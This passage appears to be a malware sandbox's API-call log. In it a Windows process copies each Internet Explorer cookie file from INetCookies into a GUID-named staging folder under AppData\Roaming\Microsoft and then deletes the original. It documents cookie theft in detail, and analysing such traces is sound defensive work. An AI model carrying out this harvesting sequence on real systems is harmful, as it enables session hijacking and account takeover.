lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.558] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 1 [0251.558] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.558] StrChrW (lpStart="2XBM2EDN.txt", wMatch=0x74c005c) returned 0x0 [0251.558] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="2XBM2EDN.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\2XBM2EDN.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\2XBM2EDN.txt" [0251.558] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\2XBM2EDN.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\2xbm2edn.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\2XBM2EDN.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\2xbm2edn.txt"), bFailIfExists=0) returned 1 [0251.562] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\2XBM2EDN.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\2xbm2edn.txt")) returned 1 [0251.563] lstrlenW (lpString="8489XH4E.txt") returned 12 [0251.563] lstrlenW (lpString="\\cookie.ie") returned 10 [0251.563] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 86 [0251.563] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.563] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.563] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.563] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.563] StrChrW (lpStart="8489XH4E.txt", wMatch=0x74c005c) returned 0x0 [0251.563] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="8489XH4E.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\8489XH4E.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\8489XH4E.txt" [0251.564] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\8489XH4E.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\8489xh4e.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\8489XH4E.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\8489xh4e.txt"), bFailIfExists=0) returned 1 [0251.567] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\8489XH4E.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\8489xh4e.txt")) returned 1 [0251.568] lstrlenW (lpString="B4K109K7.txt") returned 12 [0251.568] lstrlenW (lpString="\\cookie.ie") returned 10 [0251.568] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 86 [0251.569] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.569] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.569] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.569] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.569] StrChrW (lpStart="B4K109K7.txt", wMatch=0x74c005c) returned 0x0 [0251.569] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="B4K109K7.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\B4K109K7.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\B4K109K7.txt" [0251.569] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\B4K109K7.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\b4k109k7.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\B4K109K7.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\b4k109k7.txt"), bFailIfExists=0) returned 1 [0251.573] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\B4K109K7.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\b4k109k7.txt")) returned 1 [0251.574] lstrlenW (lpString="B67M68H4.txt") returned 12 [0251.574] lstrlenW (lpString="\\cookie.ie") returned 10 [0251.574] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 86 [0251.574] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.574] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.574] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.574] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.574] StrChrW (lpStart="B67M68H4.txt", wMatch=0x74c005c) returned 0x0 [0251.574] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="B67M68H4.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\B67M68H4.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\B67M68H4.txt" [0251.574] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\B67M68H4.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\b67m68h4.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\B67M68H4.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\b67m68h4.txt"), bFailIfExists=0) returned 1 [0251.579] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\B67M68H4.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\b67m68h4.txt")) returned 1 [0251.580] lstrlenW (lpString="OOUVZSZN.txt") returned 12 [0251.580] lstrlenW (lpString="\\cookie.ie") returned 10 [0251.580] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 86 [0251.580] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.580] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.580] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.580] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.580] StrChrW (lpStart="OOUVZSZN.txt", wMatch=0x74c005c) returned 0x0 [0251.580] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="OOUVZSZN.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\OOUVZSZN.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\OOUVZSZN.txt" [0251.580] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\OOUVZSZN.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\oouvzszn.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\OOUVZSZN.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\oouvzszn.txt"), bFailIfExists=0) returned 1 [0251.588] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\OOUVZSZN.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\oouvzszn.txt")) returned 1 [0251.589] lstrlenW (lpString="TIGZFGLM.txt") returned 12 [0251.589] lstrlenW (lpString="\\cookie.ie") returned 10 [0251.589] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 86 [0251.589] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.589] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.589] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.589] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.589] StrChrW (lpStart="TIGZFGLM.txt", wMatch=0x74c005c) returned 0x0 [0251.589] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="TIGZFGLM.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\TIGZFGLM.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\TIGZFGLM.txt" [0251.589] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\TIGZFGLM.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\tigzfglm.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\TIGZFGLM.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\tigzfglm.txt"), bFailIfExists=0) returned 1 [0251.594] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\TIGZFGLM.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\tigzfglm.txt")) returned 1 [0251.595] lstrlenW (lpString="XNW1G0SM.txt") returned 12 [0251.595] lstrlenW (lpString="\\cookie.ie") returned 10 [0251.595] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 86 [0251.595] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.595] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.595] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.595] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.595] StrChrW (lpStart="XNW1G0SM.txt", wMatch=0x74c005c) returned 0x0 [0251.595] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="XNW1G0SM.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\XNW1G0SM.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\XNW1G0SM.txt" [0251.595] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\XNW1G0SM.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\xnw1g0sm.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\XNW1G0SM.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\xnw1g0sm.txt"), bFailIfExists=0) returned 1 [0251.602] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\XNW1G0SM.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\xnw1g0sm.txt")) returned 1 [0251.603] lstrlenW (lpString="Low\\0GHTMU6X.txt") returned 16 [0251.603] lstrlenW (lpString="\\cookie.ie") returned 10 [0251.603] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned 86 [0251.603] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0251.603] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0251.603] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0251.604] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0251.604] StrChrW (lpStart="Low\\0GHTMU6X.txt", wMatch=0x74c005c) returned="\\0GHTMU6X.txt" [0251.604] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") 